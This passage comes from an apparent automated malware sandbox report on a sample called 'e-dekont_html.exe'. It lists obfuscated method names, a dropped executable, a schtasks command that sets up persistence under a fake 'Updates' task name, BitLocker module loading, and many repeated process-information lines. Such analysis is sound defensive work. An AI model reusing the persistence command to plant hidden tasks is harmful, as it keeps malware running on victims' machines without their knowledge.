                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, MuYu9FovasFrZDt22m.csHigh entropy of concatenated method names: 'zfpjR5ToCM', 'WY4j134dMx', 'WVdjN1864o', 'HaljaMcg29', 'STEjhunQt3', 'bS6jWlAXYX', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, EE0buaqyZiM121J1NhK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kZljGK2xJa', 'bsmjbxY9gY', 'dR9juYxrFg', 'WJpjCga0Lq', 'YFCjJgfLsV', 'wlBjtmnD2B', 'k1KjS6owbB'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, MkK5y6vwJZjs5JDWtI.csHigh entropy of concatenated method names: 'wSn2rURJAE', 'pnR2BHKNVh', 'C462lj2EGM', 'RMY25YbEsp', 'L2O2TGf2NJ', 'MJR2Vvr9MC', 'JcA2dpcAU0', 'khm2kb5yuS', 'O5j2XZwHS9', 'Fpg2G8Hv8T'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, w6fVOnaEhaOjHBKUqm.csHigh entropy of concatenated method names: 'vCJaORo2iZ7h9HgmlHY', 'wpYXgxo6VkkBLSHtGx4', 'yJkN939xYd', 'r4ZNhbYqF9', 'GAdNjfe4B8', 'GojxD1ogmuWO0gmFaJL', 'DUikTCoH1sOrluF5Aao'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, JLoSIhwA97O7XLgyC7.csHigh entropy of concatenated method names: 'Dispose', 'u7s3ip9b0q', 'HIsI5qVWua', 'PQGvKUhrk2', 'drf34d0xPF', 'yBd3zNTJF5', 'ProcessDialogKey', 'ht9IZYc6hA', 'gZEI3SUHIm', 'hCxIIot7Hh'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, VtsXqUbvS3rdPxQGMo.csHigh entropy of concatenated method names: 'LvKhl7BSXy', 'kNxh5VoL3m', 'RTIhqnLPI7', 'H13hT8gA18', 'xiQhVC0Zbg', 'IjfhEWJIcW', 'WbihdqoDdO', 'JUMhkMMNeB', 'U7fhpxcFKU', 'UPwhXQtc5f'
                Source: 0.2.e-dekont_html.exe.3f03770.1.raw.unpack, dHRLn7q7YB03FnCZfRs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sQkvhllP1m', 'vBcvjUsDuw', 'adjvfcQVj6', 'rf9vv9X715', 'fXvvQu8DDh', 'xSyveUxkIQ', 'lgYvHNyPSK'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, WwWQAaqqrVa5qkcNhnJ.csHigh entropy of concatenated method names: 'aEoj4vB4IJ', 'tbpjzF9BZI', 'm4yfZ8ojyk', 'fP9f3wxYAm', 'y3GfIP9Pdc', 'DWWfgOjR96', 'RIRfcMcAio', 'n34fnOvjL7', 'HXefLwr00R', 'N13f0AJEjN'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, PeiRoUhVi14ZtfH37r.csHigh entropy of concatenated method names: 'BirwYxR4D8', 'WgZwsYymM4', 'ToString', 'WrkwLrT3si', 'C55w0VtyhE', 'NacwRcRLcu', 'RYKw1NfMO2', 'r9AwNRcqdf', 'pEgwasgbX4', 'swqwW7Wi3l'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, T7geawTVduRubgjl6k.csHigh entropy of concatenated method names: 'ToString', 'N2NOG0wHr7', 'LOmO5h582G', 'DuUOqyefj7', 'wjXOT2awq5', 'op7OVOxGbF', 'R5tOE9G6ju', 'qNkOdBl6WV', 'zjROk8pXXV', 'bUxOpW0eQg'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, Mx1CEBI3fhAT2luVA2.csHigh entropy of concatenated method names: 'VhWhU39LZp', 'SZPhwVoH4F', 'w4QhhuSOi4', 'ouyhf0VOQf', 'ihUhQY1v87', 'V1fhHnPIh9', 'Dispose', 'fRj9LPGTwo', 'ePJ90Cbvy0', 'sFG9RkXdBd'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, gAT7eoJMygn6gjWsIx.csHigh entropy of concatenated method names: 'aUo0C06IhH', 'N6R0J6ALlI', 'zVZ0tbc8Vc', 'rYD0S9p8Ti', 'gR90KplyIY', 'XS10x8J3uy', 'Gpk0oa0Dkc', 'FOb07Xngpj', 'aUs0iv8bjl', 'Bur04DrePt'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, HeTSatuh0uWI5PMcPt.csHigh entropy of concatenated method names: 'Yh0gnuxnxb', 'DMJgLUJSvT', 'mhrg06qPKL', 'W8FgRPVdo1', 'jeKg1NpI80', 'oexgNeeEIY', 'wOsgaITM1u', 'tBEgWQYZsa', 'MOhg8f4SGa', 'Gr7gYmIXUp'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, cGA342shoG3dnMmo4W.csHigh entropy of concatenated method names: 'fUOw78v1fh', 'RNHw46ghuh', 'wvd9ZomAx4', 'RXq93d8Z3R', 'YLnwGujPHR', 'Gf9wbAiHBb', 's7OwuAwIV8', 'Sw6wCn6Etw', 'QmpwJJnC73', 'gRhwtfNPSK'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, lovJ0czClo5OP1EZ5p.csHigh entropy of concatenated method names: 'EvQjMENxho', 'NXMjrXYoR6', 'WcvjB7Mo8C', 'jUyjlfv20k', 'UZGj5hOnPC', 'BaojT1hka6', 'NutjVt2u5h', 'YGxjHcj8Nr', 'NdPjD7cDDf', 'matjyMws2t'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, tMpAMrZVOPEtwJuQTS.csHigh entropy of concatenated method names: 'RymNntqYrb', 'zJtN0YWdsf', 'tB0N1IjBCV', 'PwPNa6ZKF4', 'CxmNWe8cvj', 'tRH1KPMfdV', 'pZm1x1MgL1', 'p4l1oDGHeM', 'W4417ff7FA', 'pZT1iG8Ejj'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, y2xvJk7MqDGjCSRLHi.csHigh entropy of concatenated method names: 't973aZA8OM', 'WP83WJIG5m', 'nA13YsO076', 'ESU3s8TwAm', 'GPc3U3QTsk', 'l6t3OVWisM', 'j1oqxVG2dtRxF1TQY5', 'OPESoh54pRnUVMRmS5', 'kfN33KKK2G', 'gMF3gsyxxw'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, VbMlbdf1ymu5YPDwdh.csHigh entropy of concatenated method names: 'BKfAM5Ilg', 'MYi6OFBF2', 'OYHMla2fb', 'xg3FEeNsq', 'lgIBXVH8y', 'BMFmk52Nl', 'LaVSSSpUpJxc5XEJyb', 'fGsfPoM0NpdrLOHYIK', 'd459hmf7r', 'LnKj5QRNo'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, nNUAPLSS6OVAMReiLp.csHigh entropy of concatenated method names: 'nSGaDPOPmG', 'n2caypalRO', 'HfBaAaZxd1', 'PeIa6xtE7a', 'Qr3aPpmRJE', 'nQVaM75VCy', 'agIaFcaQ80', 'QW6ar8INMp', 'SeaaBk8JpB', 'mFSamxaHWi'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, qWBbWjHPNSm3x3ymNh.csHigh entropy of concatenated method names: 'oiSR6kVV8l', 'rOPRMq5hBW', 'lMtRrE7Srf', 'PaERBVW4DW', 'FACRUq0pIv', 'QD9ROdqwFD', 'lbVRwFhUJG', 'f4xR9SYjSD', 'HWXRhAxHn6', 'tXORj0DbvO'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, OktkoHOIC8r5JCWFWx.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'I6qIisSfio', 'CfXI4ZYj7P', 'lsaIzh6iWn', 'OGEgZqGbqB', 'NPGg3IQ8Yp', 'xXDgIkJQKy', 'weUggWJXBM', 'LtfdsT4bbJRtGbTDNe9'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, pu7Lw9pOUtJRgB67V4.csHigh entropy of concatenated method names: 'YQvUXvU4Dc', 'bTBUbwPr7S', 'k0ZUCOd5f8', 'Pg9UJTjZPO', 'jY9U5k9GMG', 'fyLUqaZ7Xg', 'yNbUTXsSfK', 'XmdUVJa98e', 'gq8UE9w6IF', 'cXSUd5s6OI'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, Pe0SkjXKZwcNC8GV5H.csHigh entropy of concatenated method names: 'uMZaLKWh9d', 'c8waRCi1df', 'GoGaNSDvbS', 'NakN46s9ti', 'kuQNzBUL1d', 'e4ZaZfSYa1', 'z0ua3br3H9', 'gP6aIwv9Nu', 'FS2agyaaEN', 'Y5oac3Z7n6'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, MuYu9FovasFrZDt22m.csHigh entropy of concatenated method names: 'zfpjR5ToCM', 'WY4j134dMx', 'WVdjN1864o', 'HaljaMcg29', 'STEjhunQt3', 'bS6jWlAXYX', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, EE0buaqyZiM121J1NhK.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'kZljGK2xJa', 'bsmjbxY9gY', 'dR9juYxrFg', 'WJpjCga0Lq', 'YFCjJgfLsV', 'wlBjtmnD2B', 'k1KjS6owbB'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, MkK5y6vwJZjs5JDWtI.csHigh entropy of concatenated method names: 'wSn2rURJAE', 'pnR2BHKNVh', 'C462lj2EGM', 'RMY25YbEsp', 'L2O2TGf2NJ', 'MJR2Vvr9MC', 'JcA2dpcAU0', 'khm2kb5yuS', 'O5j2XZwHS9', 'Fpg2G8Hv8T'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, w6fVOnaEhaOjHBKUqm.csHigh entropy of concatenated method names: 'vCJaORo2iZ7h9HgmlHY', 'wpYXgxo6VkkBLSHtGx4', 'yJkN939xYd', 'r4ZNhbYqF9', 'GAdNjfe4B8', 'GojxD1ogmuWO0gmFaJL', 'DUikTCoH1sOrluF5Aao'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, JLoSIhwA97O7XLgyC7.csHigh entropy of concatenated method names: 'Dispose', 'u7s3ip9b0q', 'HIsI5qVWua', 'PQGvKUhrk2', 'drf34d0xPF', 'yBd3zNTJF5', 'ProcessDialogKey', 'ht9IZYc6hA', 'gZEI3SUHIm', 'hCxIIot7Hh'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, VtsXqUbvS3rdPxQGMo.csHigh entropy of concatenated method names: 'LvKhl7BSXy', 'kNxh5VoL3m', 'RTIhqnLPI7', 'H13hT8gA18', 'xiQhVC0Zbg', 'IjfhEWJIcW', 'WbihdqoDdO', 'JUMhkMMNeB', 'U7fhpxcFKU', 'UPwhXQtc5f'
                Source: 0.2.e-dekont_html.exe.7740000.5.raw.unpack, dHRLn7q7YB03FnCZfRs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sQkvhllP1m', 'vBcvjUsDuw', 'adjvfcQVj6', 'rf9vv9X715', 'fXvvQu8DDh', 'xSyveUxkIQ', 'lgYvHNyPSK'
                Source: C:\Users\user\Desktop\e-dekont_html.exeFile created: C:\Users\user\AppData\Roaming\fahKSvwo.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
